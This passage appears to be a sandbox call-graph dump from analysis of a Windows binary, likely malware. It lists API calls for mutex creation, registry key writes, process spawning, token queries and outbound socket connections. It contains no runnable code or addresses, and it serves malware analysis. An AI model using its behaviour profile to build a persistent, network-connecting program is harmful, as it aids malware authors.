27480->27481 27481->27478 27485 432e79 2 API calls 27487 43f3ce 27485->27487 27486 433264 3 API calls 27488 43f428 27486->27488 27489 4354a5 8 API calls 27487->27489 27786 435a2d VirtualFree 27488->27786 27491 43f3d8 27489->27491 27492 435c32 4 API calls 27491->27492 27493 43f3e0 27492->27493 27771 432d08 27493->27771 27496 433264 3 API calls 27497 43f3f3 27496->27497 27785 435a2d VirtualFree 27497->27785 27499 43f3fb 27500 432e66 2 API calls 27499->27500 27501 43f406 27500->27501 27501->27480 27776 43d425 27501->27776 27807 435467 27502->27807 27504 434b23 27812 431d11 27504->27812 27510 43dbda 27509->27510 27511 43dbba GetTokenInformation 27509->27511 27512 43dbe0 CloseHandle 27510->27512 27513 43dbe9 27510->27513 27511->27510 27512->27513 27513->27337 27513->27348 27516 434a9e 27514->27516 27515 4357f5 lstrlenW lstrcpyW VirtualAlloc 27515->27516 27516->27515 27831 433381 27516->27831 27848 43538f 27516->27848 27519 435a2d VirtualFree 27520 434ac8 27519->27520 27520->27519 27521 434aef Sleep 27520->27521 27859 4351e4 64 API calls 27520->27859 27521->27516 27523 434b0a 27521->27523 27523->27356 27524->27357 27525->27368 27526->27337 27527->27340 27528->27354 27530 43348a 27529->27530 27531 43346c 27529->27531 27536 43eb77 CreateProcessW 27530->27536 27532 43308e lstrlenW 27531->27532 27533 433473 27532->27533 27875 435a3c VirtualAlloc 27533->27875 27535 43347f lstrcpyW 27535->27530 27536->27371 27537->27375 27538->27377 27539->27346 27632 43de6c 27541->27632 27545 4355c4 27546 43fbfc 27545->27546 27547 43fc02 27546->27547 27548 4355c9 27547->27548 27549 43fc08 MessageBoxA 27547->27549 27550 43e2e4 27548->27550 27549->27548 27551 43e300 27550->27551 27562 4355d2 27550->27562 27552 43e31f 27551->27552 27553 43e37d 27551->27553 27551->27562 27637 432dc1 27552->27637 27555 432dc1 6 API calls 27553->27555 27553->27562 27559 43e39b 27555->27559 27557 43ea61 6 API calls 27557->27559 27558 43e335 27558->27562 27640 43ea61 27558->27640 27644 4321ba 27558->27644 27559->27557 27561 4321ba 6 API calls 27559->27561 27559->27562 27561->27559 27563 4331ec lstrlenA 27562->27563 27564 43321b 27563->27564 27565 4331ff lstrlenA 27563->27565 27568 43e257 27564->27568 27667 4359aa VirtualAlloc 27565->27667 27567 43320f lstrcpyA 27567->27564 27574 43e269 27568->27574 27578 4355ef 27568->27578 27571 4331ec 4 API calls 27571->27574 27574->27571 27575 432e66 2 API calls 27574->27575 27576 43e2ce 27574->27576 27574->27578 27669 43582b LoadLibraryA GetProcAddress 27574->27669 27674 43ea97 27574->27674 27677 4331d0 lstrcmpA 27574->27677 27678 435a2d VirtualFree 27574->27678 27575->27574 27679 4322c2 LoadLibraryA GetProcAddress ExitProcess GetProcessHeap RtlAllocateHeap 27576->27679 27579 435a2d VirtualFree 27578->27579 27579->27392 27680 435a87 GetProcessHeap RtlAllocateHeap 27580->27680 27582 432e8b 27582->27394 27584 432ce4 27583->27584 27586 432ce9 27583->27586 27681 435a87 GetProcessHeap RtlAllocateHeap 27584->27681 27586->27396 27588 432e74 27587->27588 27589 432e6f 27587->27589 27591 4354f2 27588->27591 27682 435a76 GetProcessHeap HeapFree 27589->27682 27683 432c85 27591->27683 27594 432e79 2 API calls 27595 435525 27594->27595 27690 4354a5 27595->27690 27600 432e66 2 API calls 27601 435542 27600->27601 27602 43fc1e 27601->27602 27603 43fc32 27602->27603 27611 435633 27602->27611 27713 435adb GetProcessHeap HeapAlloc 27603->27713 27605 43fc3e 27714 433412 lstrlenW 27605->27714 27607 43fc61 27608 433264 3 API calls 27607->27608 27609 43fc69 27608->27609 27719 435a2d VirtualFree 27609->27719 27612 433264 27611->27612 27613 433276 27612->27613 27614 43328f 27612->27614 27722 4331b1 lstrlenW 27613->27722 27619 435a2d VirtualFree 27614->27619 27616 43327d 27617 4359aa VirtualAlloc 27616->27617 27618 433284 lstrcpyW 27617->27618 27618->27614 27619->27406 27620->27412 27621->27418 27622->27424 27623->27430 27723 43e0c3 27624->27723 27628 43de9b 27727 435a2d VirtualFree 27628->27727 27630 435774 27630->27441 27631->27435 27636 43e236 CreateMutexA 27632->27636 27634 43de7c 27635 435adb GetProcessHeap HeapAlloc 27634->27635 27635->27545 27636->27634 27656 435a4d 27637->27656 27639 432dd7 27639->27558 27641 43ea7a 27640->27641 27642 432dc1 6 API calls 27641->27642 27643 43ea8f 27642->27643 27643->27558 27645 432288 27644->27645 27646 4321d4 27644->27646 27648 432ccc 2 API calls 27645->27648 27665 435adb GetProcessHeap HeapAlloc 27646->27665 27649 4322b0 27648->27649 27650 432e66 2 API calls 27649->27650 27651 4322bb 27650->27651 27651->27558 27652 432279 27652->27645 27666 431db4 GetProcessHeap HeapFree 27652->27666 27653 4321fd 27653->27652 27654 432ccc 2 API calls 27653->27654 27654->27653 27657 435a51 GetProcessHeap RtlAllocateHeap 27656->27657 27658 435a58 27656->27658 27657->27639 27660 435a64 GetProcessHeap HeapReAlloc 27658->27660 27661 435a5c 27658->27661 27660->27639 27664 435a76 GetProcessHeap HeapFree 27661->27664 27663 435a61 27663->27639 27664->27663 27665->27653 27666->27645 27668 4359c8 27667->27668 27668->27567 27670 43584a 27669->27670 27671 435869 27669->27671 27672 435861 ExitProcess 27670->27672 27673 43584e 27670->27673 27671->27574 27673->27672 27675 432ccc 2 API calls 27674->27675 27676 43eabf 27675->27676 27676->27574 27677->27574 27678->27574 27679->27578 27680->27582 27681->27586 27682->27588 27711 435a87 GetProcessHeap RtlAllocateHeap 27683->27711 27685 432c94 27686 432dc1 6 API calls 27685->27686 27687 432cbd 27686->27687 27712 435a76 GetProcessHeap HeapFree 27687->27712 27689 432cc4 27689->27594 27691 4354d9 27690->27691 27692 4354b7 27690->27692 27694 432e79 2 API calls 27691->27694 27693 432c85 8 API calls 27692->27693 27695 4354c9 27693->27695 27696 4354e9 27694->27696 27697 432ccc 2 API calls 27695->27697 27700 435c32 27696->27700 27698 4354d1 27697->27698 27699 432e66 2 API calls 27698->27699 27699->27691 27701 432e79 2 API calls 27700->27701 27702 435c4a 27701->27702 27703 432e79 2 API calls 27702->27703 27704 435c8a 27703->27704 27705 432e66 2 API calls 27704->27705 27706 435c92 27705->27706 27707 432e66 2 API calls 27706->27707 27708 435c9a 27707->27708 27709 432e66 2 API calls 27708->27709 27710 435537 27709->27710 27710->27600 27711->27685 27712->27689 27713->27605 27715 4359aa VirtualAlloc 27714->27715 27716 43342d lstrlenW 27715->27716 27720 435ab9 27716->27720 27718 433447 lstrcpyW 27718->27607 27719->27611 27721 435ac5 27720->27721 27721->27718 27722->27616 27724 43de93 27723->27724 27725 43e0cc CloseHandle 27723->27725 27726 43e221 ReleaseMutex CloseHandle 27724->27726 27725->27724 27726->27628 27727->27630 27729 432ccc 2 API calls 27728->27729 27730 432310 27729->27730 27731 433264 3 API calls 27730->27731 27732 43231c 27731->27732 27733 433264 3 API calls 27732->27733 27734 432334 27733->27734 27735 433264 3 API calls 27734->27735 27736 432346 27735->27736 27737 433264 3 API calls 27736->27737 27738 432352 27737->27738 27739 433264 3 API calls 27738->27739 27740 432364 27739->27740 27741 432ccc 2 API calls 27740->27741 27742 432388 27741->27742 27742->27444 27743->27451 27787 43308e 27744->27787 27746 433174 27747 43308e lstrlenW 27746->27747 27748 43317d 27747->27748 27790 4359ce 27748->27790 27751->27457 27752->27463 27753->27469 27754->27475 27756 43f043 RegOpenKeyExW 27755->27756 27757 43f010 27755->27757 27760 43f057 27756->27760 27801 43d721 RegOpenKeyExW RegCloseKey 27757->27801 27759 43f01a 27759->27756 27761 43f01e RegCreateKeyExW 27759->27761 27760->27478 27760->27501 27764 43ef61 RegQueryValueExW 27760->27764 27761->27760 27762 43f03c 27761->27762 27802 43ef4c RegCloseKey 27762->27802 27765 43efbd 27764->27765 27766 43ef8e 27764->27766 27765->27485 27765->27501 27803 435adb GetProcessHeap HeapAlloc 27766->27803 27768 43ef96 RegQueryValueExW 27768->27765 27769 43efb1 27768->27769 27770 432dc1 6 API calls 27769->27770 27770->27765 27804 435adb GetProcessHeap HeapAlloc 27771->27804 27773 432d28 27774 433412 4 API calls 27773->27774 27775 432d4f 27774->27775 27775->27496 27805 435adb GetProcessHeap HeapAlloc 27776->27805 27778 43d437 GetModuleFileNameW 27779 433412 4 API calls 27778->27779 27780 43d453 27779->27780 27781 433264 3 API calls 27780->27781 27782 43d45b 27781->27782 27806 435a2d VirtualFree 27782->27806 27784 43d463 27784->27486 27785->27499 27786->27480 27788 433093 lstrlenW 27787->27788 27789 43309c 27787->27789 27788->27746 27789->27746 27791 4359e4 27790->27791 27792 4359e9 27790->27792 27798 43598a VirtualQuery 27791->27798 27797 4359f9 27792->27797 27799 435a3c VirtualAlloc 27792->27799 27795 43318d lstrcatW 27795->27455 27797->27795 27800 435a2d VirtualFree 27797->27800 27798->27792 27799->27797 27800->27795 27801->27759 27802->27756 27803->27768 27804->27773 27805->27778 27806->27784 27808 432ff0 VirtualAlloc 27807->27808 27809 435470 27808->27809 27830 43e236 CreateMutexA 27809->27830 27811 43548a WSAStartup 27811->27504 27813 432e79 2 API calls 27812->27813 27814 431d33 27813->27814 27815 43345a 3 API calls 27814->27815 27816 431d3f 27815->27816 27817 43345a 3 API calls 27816->27817 27818 431d57 27817->27818 27819 43345a 3 API calls 27818->27819 27820 431d69 27819->27820 27821 43345a 3 API calls 27820->27821 27822 431d75 27821->27822 27823 43345a 3 API calls 27822->27823 27824 431d87 27823->27824 27825 432e79 2 API calls 27824->27825 27826 431dab 27825->27826 27827 432ff0 27826->27827 27828 4359aa VirtualAlloc 27827->27828 27829 432ffb 27828->27829 27829->27335 27830->27811 27832 432ff0 VirtualAlloc 27831->27832 27833 433394 27832->27833 27834 433400 27833->27834 27835 43308e lstrlenW 27833->27835 27834->27516 27836 4333a5 WideCharToMultiByte 27835->27836 27860 435a3c VirtualAlloc 27836->27860 27838 4333bd 27839 43308e lstrlenW 27838->27839 27840 4333cf WideCharToMultiByte 27839->27840 27841 4331ec 4 API calls 27840->27841 27842 4333e8 27841->27842 27861 432f52 27842->27861 27846 4333f9 27870 435a2d VirtualFree 27846->27870 27849 432f52 4 API calls 27848->27849 27850 4353a7 27849->27850 27873 43e20d WaitForSingleObject 27850->27873 27852 4353b8 getaddrinfo 27853 435440 27852->27853 27854 4353e6 socket 27852->27854 27874 435a2d VirtualFree 27853->27874 27854->27853 27855 435401 htons freeaddrinfo connect 27854->27855 27855->27853 27856 435456 ReleaseMutex 27855->27856 27856->27853 27858 43544d 27858->27520 27859->27521 27860->27838 27871 435a2d VirtualFree 27861->27871 27863 432f60 27864 432f84 27863->27864 27872 43319f lstrlenA 27863->27872 27869 435a2d VirtualFree 27864->27869 27866 432f72 27867 4359aa VirtualAlloc 27866->27867 27868 432f79 lstrcatA 27867->27868 27868->27864 27869->27846 27870->27834 27871->27863 27872->27866 27873->27852 27874->27858 27875->27535 27876 43c987 InitializeCriticalSection 27916 435adb GetProcessHeap HeapAlloc 27876->27916 27878 43c9cf 27917 43312c 27878->27917 27881 43312c 9 API calls 27882 43ca18 27881->27882 27927 43dbf3 GetCurrentProcess 27882->27927 27885 43ca22 27888 43312c 9 API calls 27885->27888 27886 43ca57 27930 433001 27886->27930 27890 43ca2e 27888->27890 27892 433001 5 API calls 27890->27892 27891 433264 3 API calls 27893 43ca6e 27891->27893 27894 43ca38 27892->27894 27944 435a2d VirtualFree 27893->27944 27895 433264 3 API calls 27894->27895 27897 43ca45 27895->27897 27943 435a2d VirtualFree 27897->27943 27898 43ca55 27935 433297 27898->27935 27901 43ca4d 27903 43312c 9 API calls 27901->27903 27903->27898 27904 433297 9 API calls 27905 43ca8b 27904->27905 27942 43d70f SHCreateDirectoryExW 27905->27942 27907 43ca92 27908 433264 3 API calls 27907->27908 27909 43ca9f 27908->27909 27910 433297 9 API calls 27909->27910 27911 43caab 27910->27911 27912 433297 9 API calls 27911->27912 27913 43cab8 27912->27913 27914 433297 9 API calls 27913->27914 27915 43cac0 27914->27915 27916->27878 27918 43313d 27917->27918 27919 433138 27917->27919 27920 433412 4 API calls 27918->27920 27946 435a2d VirtualFree 27919->27946 27922 43314b 27920->27922 27923 433162 5 API calls 27922->27923 27924 433153 27923->27924 27945 435a2d VirtualFree 27924->27945 27926 43315b 27926->27881 27947 43ebd4 GetModuleHandleA GetProcAddress 27927->27947 27950 431052 27930->27950 27933 433412 4 API calls 27934 433048 27933->27934 27934->27891 27936 433412 4 API calls 27935->27936 27937 4332a8 27936->27937 27938 433162 5 API calls 27937->27938 27939 4332b0 27938->27939 27952 435a2d VirtualFree 27939->27952 27941 4332b8 27941->27904 27942->27907 27943->27901 27944->27898 27945->27926 27946->27918 27948 43ca1d 27947->27948 27949 43ebfa IsWow64Process 27947->27949 27948->27885 27948->27886 27949->27948 27951 43105a ExpandEnvironmentStringsW 27950->27951 27951->27933 27952->27941 27953 cc12e6 27954 cc12f2 ___scrt_is_nonwritable_in_current_image 27953->27954 27984 cc14ff 27954->27984 27956 cc12f9 27957 cc144c 27956->27957 27960 cc1323 27956->27960 28016 cc1817 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 27957->28016 27959 cc1453 28017 cc53f7 29 API calls pre_c_initialization 27959->28017 27968 cc1362 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 27960->27968 27995 cc50af 27960->27995 27962 cc1459 28018 cc53a9 29 API calls pre_c_initialization 27962->28018 27966 cc1461 27967 cc1342 27975 cc13c3 27968->27975 28012 cc53bf 39 API calls pre_c_initialization 27968->28012 27974 cc13d2 27976 cc13de 27974->27976 28003 cc1931 27975->28003 28013 cc1967 GetModuleHandleW 27976->28013 27978 cc13e5 27978->27959 27979 cc13e9 27978->27979 27980 cc13f2 27979->27980 28014 cc539a 29 API calls pre_c_initialization 27979->28014 28015 cc168e 77 API calls 2 library calls 27980->28015 27983 cc13fa 27983->27967 27985 cc1508 27984->27985 28019 cc1abb IsProcessorFeaturePresent 27985->28019 27987 cc1514 28020 cc1f27 27987->28020 27989 cc1519 27990 cc151d 27989->27990 28029 cc5a49 27989->28029 27990->27956 27993 cc1534 27993->27956 27998 cc50c6 27995->27998 27996 cc1c5e _ValidateLocalCookies 5 API calls 27997 cc133c 27996->27997 27997->27967 27999 cc5053 27997->27999 27998->27996 28000 cc5082 27999->28000 28001 cc1c5e _ValidateLocalCookies 5 API calls 28000->28001 28002 cc50ab 28001->28002 28002->27968 28160 cc1f70 28003->28160 28005 cc1944 GetStartupInfoW 28006 cc13c9 28005->28006 28007 cc5000 28006->28007 28161 cc8f80 28007->28161 28009 cc5009 28010 cc5043 28009->28010 28167 cc92af 39 API calls 28009->28167 28010->27974 28012->27975 28013->27978 28014->27980 28015->27983 28016->27959 28017->27962 28018->27966 28019->27987 28021 cc1f2c ___vcrt_initialize_winapi_thunks 28020->28021 28033 cc22fe 28021->28033 28024 cc1f3a 28024->27989 28026 cc1f42 28027 cc1f4d 28026->28027 28047 cc233a DeleteCriticalSection 28026->28047 28027->27989 28075 cc9ee2 28029->28075 28032 cc1f50 8 API calls 3 library calls 28032->27990 28034 cc2307 28033->28034 28036 cc2330 28034->28036 28038 cc1f36 28034->28038 28048 cc2550 28034->28048 28053 cc233a DeleteCriticalSection 28036->28053 28038->28024 28039 cc22b0 28038->28039 28068 cc249c 28039->28068 28042 cc22c5 28042->28026 28044 cc22d3 28045 cc22e0 28044->28045 28074 cc22e3 6 API calls ___vcrt_FlsFree 28044->28074 28045->28026 28047->28024 28054 cc242d 28048->28054 28050 cc256a 28051 cc2588 InitializeCriticalSectionAndSpinCount 28050->28051 28052 cc2573 28050->28052 28051->28052 28052->28034 28053->28038 28055 cc2455 28054->28055 28058 cc2451 __crt_fast_encode_pointer 28054->28058 28055->28058 28061 cc2369 28055->28061 28058->28050 28059 cc246f GetProcAddress 28059->28058 28060 cc247f __crt_fast_encode_pointer 28059->28060 28060->28058 28062 cc2378 try_get_first_available_module 28061->28062 28063 cc2395 LoadLibraryExW 28062->28063 28065 cc240b FreeLibrary 28062->28065 28066 cc2422 28062->28066 28067 cc23e3 LoadLibraryExW 28062->28067 28063->28062 28064 cc23b0 GetLastError 28063->28064 28064->28062 28065->28062 28066->28058 28066->28059 28067->28062 28069 cc242d try_get_function 5 API calls 28068->28069 28070 cc24b6 28069->28070 28071 cc24cf TlsAlloc 28070->28071 28072 cc22ba 28070->28072 28072->28042 28073 cc2512 6 API calls try_get_function 28072->28073 28073->28044 28074->28042 28078 cc9eff 28075->28078 28079 cc9efb 28075->28079 28077 cc1526 28077->27993 28077->28032 28078->28079 28081 cc6c48 28078->28081 28093 cc1c5e 28079->28093 28082 cc6c54 ___scrt_is_nonwritable_in_current_image 28081->28082 28100 cc93db EnterCriticalSection 28082->28100 28084 cc6c5b 28101 cc951c 28084->28101 28086 cc6c6a 28087 cc6c79 28086->28087 28114 cc6adc 29 API calls 28086->28114 28116 cc6c95 LeaveCriticalSection __onexit 28087->28116 28090 cc6c8a __onexit 28090->28078 28091 cc6c74 28115 cc6b94 GetStdHandle GetFileType 28091->28115 28094 cc1c69 IsProcessorFeaturePresent 28093->28094 28095 cc1c67 28093->28095 28097 cc1cab 28094->28097 28095->28077 28159 cc1c6f SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 28097->28159 28099 cc1d8e 28099->28077 28100->28084 28102 cc9528 ___scrt_is_nonwritable_in_current_image 28101->28102 28103 cc9548 28102->28103 28104 cc9531 28102->28104 28117 cc93db EnterCriticalSection 28103->28117 28125 cc621a 20 API calls __dosmaperr 28104->28125 28107 cc9536 28126 cc615d 26 API calls __cftof 28107->28126 28109 cc9540 __onexit 28109->28086 28110 cc9580 28127 cc95a7 LeaveCriticalSection __onexit 28110->28127 28111 cc9554 28111->28110 28118 cc946d 28111->28118 28114->28091 28115->28087 28116->28090 28117->28111 28128 cc622d 28118->28128 28120 cc947f 28124 cc948c 28120->28124 28135 cc65f4 28120->28135 28123 cc94de 28123->28111 28142 cc628a 20 API calls _free 28124->28142 28125->28107 28126->28109 28127->28109 28133 cc623a pre_c_initialization 28128->28133 28129 cc627a 28144 cc621a 20 API calls __dosmaperr 28129->28144 28130 cc6265 RtlAllocateHeap 28132 cc6278 28130->28132 28130->28133 28132->28120 28133->28129 28133->28130 28143 cc9fbc 7 API calls 2 library calls 28133->28143 28145 cc63c0 28135->28145 28138 cc6639 InitializeCriticalSectionAndSpinCount 28139 cc6624 28138->28139 28140 cc1c5e _ValidateLocalCookies 5 API calls 28139->28140 28141 cc6650 28140->28141 28141->28120 28142->28123 28143->28133 28144->28132 28146 cc63ed 28145->28146 28151 cc63e9 28145->28151 28146->28151 28152 cc62f8 28146->28152 28149 cc6407 GetProcAddress 28150 cc6417 __crt_fast_encode_pointer 28149->28150 28149->28151 28150->28151 28151->28138 28151->28139 28157 cc6309 try_get_first_available_module 28152->28157 28153 cc63b3 28153->28149 28153->28151 28154 cc6326 LoadLibraryExW 28155 cc6341 GetLastError 28154->28155 28154->28157 28155->28157 28156 cc639c FreeLibrary 28156->28157 28157->28153 28157->28154 28157->28156 28158 cc6374 LoadLibraryExW 28157->28158 28158->28157 28159->28099 28160->28005 28162 cc8f89 28161->28162 28163 cc8fbb 28161->28163 28168 cc7867 28162->28168 28163->28009 28167->28009 28169 cc7872 28168->28169 28172 cc7878 28168->28172 28211 cc6545 11 API calls 2 library calls 28169->28211 28174 cc787e 28172->28174 28212 cc659b 11 API calls 2 library calls 28172->28212 28173 cc7892 28173->28174 28175 cc622d pre_c_initialization 20 API calls 28173->28175 28178 cc78f7 28174->28178 28219 cc5b9d 39 API calls pre_c_initialization 28174->28219 28177 cc78a2 28175->28177 28180 cc78bf 28177->28180 28181 cc78aa 28177->28181 28193 cc8dd2 28178->28193 28215 cc659b 11 API calls 2 library calls 28180->28215 28213 cc659b 11 API calls 2 library calls 28181->28213 28184 cc78cb 28186 cc78de 28184->28186 28187 cc78cf 28184->28187 28185 cc78b6 28214 cc628a 20 API calls _free 28185->28214 28217 cc75dd 20 API calls pre_c_initialization 28186->28217 28216 cc659b 11 API calls 2 library calls 28187->28216 28191 cc78e9 28218 cc628a 20 API calls _free 28191->28218 28220 cc8eed 28193->28220 28195 cc8de5 28227 cc8b66 28195->28227 28198 cc8dfe 28198->28163 28201 cc8e41 28255 cc628a 20 API calls _free 28201->28255 28205 cc8e3c 28254 cc621a 20 API calls __dosmaperr 28205->28254 28207 cc8e85 28207->28201 28257 cc8a62 26 API calls 2 library calls 28207->28257 28208 cc8e59 28208->28207 28256 cc628a 20 API calls _free 28208->28256 28211->28172 28212->28173 28213->28185 28214->28174 28215->28184 28216->28185 28217->28191 28218->28174 28225 cc8ef9 ___scrt_is_nonwritable_in_current_image 28220->28225 28222 cc8f78 __onexit 28222->28195 28225->28222 28258 cc5b9d 39 API calls pre_c_initialization 28225->28258 28259 cc93db EnterCriticalSection 28225->28259 28260 cc628a 20 API calls _free 28225->28260 28261 cc8f6f LeaveCriticalSection __onexit 28225->28261 28262 cc375f 28227->28262 28230 cc8b99 28232 cc8bb0 28230->28232 28233 cc8b9e GetACP 28230->28233 28231 cc8b87 GetOEMCP 28231->28232 28232->28198 28234 cc6edf 28232->28234 28233->28232 28235 cc6f1d 28234->28235 28236 cc6eed 28234->28236 28274 cc621a 20 API calls __dosmaperr 28235->28274 28237 cc6f08 HeapAlloc 28236->28237 28242 cc6ef1 pre_c_initialization 28236->28242 28239 cc6f1b 28237->28239 28237->28242 28240 cc6f22 28239->28240 28240->28201 28243 cc8fdb 28240->28243 28242->28235 28242->28237 28273 cc9fbc 7 API calls 2 library calls 28242->28273 28244 cc8b66 41 API calls 28243->28244 28245 cc8ffa 28244->28245 28247 cc9058 IsValidCodePage 28245->28247 28248 cc904a GetACP 28245->28248 28251 cc9004 28245->28251 28253 cc907d ___scrt_fastfail 28245->28253 28246 cc1c5e _ValidateLocalCookies 5 API calls 28249 cc8e34 28246->28249 28250 cc906a GetCPInfo 28247->28250 28247->28251 28248->28247 28248->28251 28249->28205 28249->28208 28250->28251 28250->28253 28251->28246 28275 cc8c3e GetCPInfo 28253->28275 28254->28201 28255->28198 28256->28207 28257->28201 28259->28225 28260->28225 28261->28225 28263 cc377c 28262->28263 28269 cc3772 28262->28269 28263->28269 28270 cc77b3 39 API calls 2 library calls 28263->28270 28265 cc379d 28271 cc79fa 39 API calls __cftof 28265->28271 28267 cc37b6 28272 cc7a27 39 API calls __cftof 28267->28272 28269->28230 28269->28231 28270->28265 28271->28267 28272->28269 28273->28242 28274->28240 28276 cc8d22 28275->28276 28277 cc8c78 28275->28277 28280 cc1c5e _ValidateLocalCookies 5 API calls 28276->28280 28285 cc999a 28277->28285 28282 cc8dce 28280->28282 28282->28251 28284 ccb6f3 __vfwprintf_l 44 API calls 28284->28276 28286 cc375f __cftof 39 API calls 28285->28286 28287 cc99ba MultiByteToWideChar 28286->28287 28289 cc99f3 28287->28289 28296 cc9a77 28287->28296 28292 cc6edf __vfwprintf_l 21 API calls 28289->28292 28297 cc9a0b ___scrt_fastfail __vfwprintf_l 28289->28297 28290 cc1c5e _ValidateLocalCookies 5 API calls 28293 cc8cd9 28290->28293 28291 cc9a71 28304 cc9a9e 20 API calls _free 28291->28304 28292->28297 28299 ccb6f3 28293->28299 28295 cc9a47 MultiByteToWideChar 28295->28291 28298 cc9a61 GetStringTypeW 28295->28298 28296->28290 28297->28291 28297->28295 28298->28291 28300 cc375f __cftof 39 API calls 28299->28300 28301 ccb706 28300->28301 28305 ccb50d 28301->28305 28304->28296 28306 ccb528 __vfwprintf_l 28305->28306 28307 ccb54e MultiByteToWideChar 28306->28307 28308 ccb57a 28307->28308 28319 ccb6cb 28307->28319 28312 cc6edf __vfwprintf_l 21 API calls 28308->28312 28317 ccb58f __vfwprintf_l 28308->28317 28309 cc1c5e _ValidateLocalCookies 5 API calls 28310 cc8cfa 28309->28310 28310->28284 28311 ccb5c7 MultiByteToWideChar 28313 ccb5de 28311->28313 28314 ccb632 28311->28314 28312->28317 28332 cc6656 28313->28332 28341 cc9a9e 20 API calls _free 28314->28341 28317->28311 28317->28314 28319->28309 28320 ccb609 28320->28314 28323 cc6656 __vfwprintf_l 11 API calls 28320->28323 28321 ccb641 28322 cc6edf __vfwprintf_l 21 API calls 28321->28322 28326 ccb653 __vfwprintf_l 28321->28326 28322->28326 28323->28314 28324 ccb6bc 28340 cc9a9e 20 API calls _free 28324->28340 28326->28324 28327 cc6656 __vfwprintf_l 11 API calls 28326->28327 28328 ccb69b 28327->28328 28328->28324 28329 ccb6aa WideCharToMultiByte 28328->28329 28329->28324 28330 ccb6ea 28329->28330 28342 cc9a9e 20 API calls _free 28330->28342 28343 cc62c4 28332->28343 28336 cc66b2 LCMapStringW 28337 cc6672 28336->28337 28338 cc1c5e _ValidateLocalCookies 5 API calls 28337->28338 28339 cc66c4 28338->28339 28339->28314 28339->28320 28339->28321 28340->28314 28341->28319 28342->28314 28344 cc63c0 pre_c_initialization 5 API calls 28343->28344 28345 cc62da 28344->28345 28345->28337 28346 cc66ca 10 API calls 2 library calls 28345->28346 28346->28336 28347 cd6aa6 28348 cd6abb 28347->28348 28350 cd6b95 28348->28350 28385 cc1040 79 API calls __vfwprintf_l 28348->28385 28353 cd6c24 28350->28353 28386 cc1040 79 API calls __vfwprintf_l 28350->28386 28355 cd6f17 28353->28355 28387 cc1040 79 API calls __vfwprintf_l 28353->28387 28359 cd707f 28355->28359 28388 cc1040 79 API calls __vfwprintf_l 28355->28388 28358 cd717c 28361 cd71cc 28358->28361 28390 cc1040 79 API calls __vfwprintf_l 28358->28390 28359->28358 28389 cc1040 79 API calls __vfwprintf_l 28359->28389 28360 cd72c0 28367 cd7331 28360->28367 28392 cc1040 79 API calls __vfwprintf_l 28360->28392 28361->28360 28391 cc1040 79 API calls __vfwprintf_l 28361->28391 28365 cd7498 28368 cd74e8 28365->28368 28394 cc1040 79 API calls __vfwprintf_l 28365->28394 28367->28365 28393 cc1040 79 API calls __vfwprintf_l 28367->28393 28371 cd7614 28368->28371 28395 cc1040 79 API calls __vfwprintf_l 28368->28395 28373 cd7707 28371->28373 28396 cc1040 79 API calls __vfwprintf_l 28371->28396 28374 cd77a9 28373->28374 28397 cc1040 79 API calls __vfwprintf_l 28373->28397 28376 cd781b 28374->28376 28398 cc1040 79 API calls __vfwprintf_l 28374->28398 28377 cd78c2 Sleep 28376->28377 28383 cd78cf 28376->28383 28377->28376 28378 cd79f6 28401 ce1280 79 API calls 28378->28401 28380 cd7a08 28381 cd79a6 28381->28378 28400 cc1040 79 API calls __vfwprintf_l 28381->28400 28383->28381 28399 cc1040 79 API calls __vfwprintf_l 28383->28399 28385->28348 28386->28350 28387->28353 28388->28355 28389->28359 28390->28358 28391->28361 28392->28360 28393->28367 28394->28365 28395->28368 28396->28371 28397->28373 28398->28374 28399->28383 28400->28381 28401->28380 28402 cd1106 WSAStartup socket 28403 cd113c inet_addr htons connect 28402->28403 28404 cd1137 28402->28404 28405 cd1100 28403->28405 28405->28402 28406 43118f 28409 4401ce 28406->28409 28416 43e236 CreateMutexA 28409->28416 28411 4401e3 28417 435adb GetProcessHeap HeapAlloc 28411->28417 28413 4401eb 28415 431194 28413->28415 28418 440c9a 28413->28418 28416->28411 28417->28413 28430 435adb GetProcessHeap HeapAlloc 28418->28430 28420 440cba 28431 435adb GetProcessHeap HeapAlloc 28420->28431 28422 440ce4 28424 440cf0 28422->28424 28441 440430 GetProcessHeap HeapAlloc 28422->28441 28432 4406d5 CoInitialize CoCreateInstance 28424->28432 28427 440d10 28427->28415 28428 440d02 28428->28427 28442 440500 12 API calls 28428->28442 28430->28420 28431->28422 28433 44082c 28432->28433 28438 440715 28432->28438 28433->28427 28433->28428 28435 44075c VariantInit 28435->28438 28436 440806 CoUninitialize 28436->28433 28438->28433 28438->28435 28438->28436 28443 435adb GetProcessHeap HeapAlloc 28438->28443 28444 44098d GetProcessHeap HeapAlloc 28438->28444 28445 43239f GetProcessHeap HeapAlloc 28438->28445 28441->28424 28442->28428 28443->28438 28444->28438 28445->28438 28446 cd7a20 28447 cd7a3c 28446->28447 28448 cd7b65 VirtualAlloc 28447->28448 28449 cd7b94 _strlen 28448->28449 28450 cc1462 28453 cc1753 28450->28453 28452 cc1467 28452->28452 28454 cc1769 28453->28454 28455 cc1772 28454->28455 28457 cc1706 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId RtlQueryPerformanceCounter 28454->28457 28455->28452 28457->28455 28458 cc4dfc 28459 cc8f80 53 API calls 28458->28459 28460 cc4e0e 28459->28460 28469 cc9317 GetEnvironmentStringsW 28460->28469 28464 cc4e24 28482 cc628a 20 API calls _free 28464->28482 28466 cc4e48 28468 cc4e19 28483 cc628a 20 API calls _free 28468->28483 28470 cc932e 28469->28470 28480 cc9381 28469->28480 28473 cc9334 WideCharToMultiByte 28470->28473 28471 cc938a FreeEnvironmentStringsW 28472 cc4e13 28471->28472 28472->28468 28481 cc4e4e 26 API calls 4 library calls 28472->28481 28474 cc9350 28473->28474 28473->28480 28475 cc6edf __vfwprintf_l 21 API calls 28474->28475 28476 cc9356 28475->28476 28477 cc935d WideCharToMultiByte 28476->28477 28478 cc9373 28476->28478 28477->28478 28484 cc628a 20 API calls _free 28478->28484 28480->28471 28480->28472 28481->28464 28482->28468 28483->28466 28484->28480 28485 cc939a 28486 cc93a5 28485->28486 28487 cc65f4 11 API calls 28486->28487 28488 cc93ce 28486->28488 28489 cc93ca 28486->28489 28487->28486 28491 cc93f2 DeleteCriticalSection 28488->28491 28491->28489 28492 438c74 28493 438c7f 28492->28493 28494 435a2d 